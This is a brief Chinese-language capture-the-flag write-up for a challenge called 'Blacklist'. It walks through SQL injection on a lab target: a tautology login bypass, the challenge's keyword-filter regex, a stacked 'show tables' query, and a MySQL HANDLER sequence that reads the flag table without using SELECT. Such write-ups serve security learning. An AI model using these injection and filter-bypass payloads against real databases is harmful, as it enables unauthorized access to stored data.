Blacklist

万能钥匙穿了
1' or '1'='1'#
上select被过滤了
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
感觉很像强网杯的随便注（看了一下就是），然后就是堆叠注入了。
1';show tables;#
​官方文档。使用OPEN打开表的会话，在CLOSE前不会关闭；使其在打开期间使用READ读取文件。
1';
HANDLER FlagHere OPEN;
HANDLER FlagHere READ FIRST;
HANDLER FlagHere CLOSE;
#
Last modified 8mo ago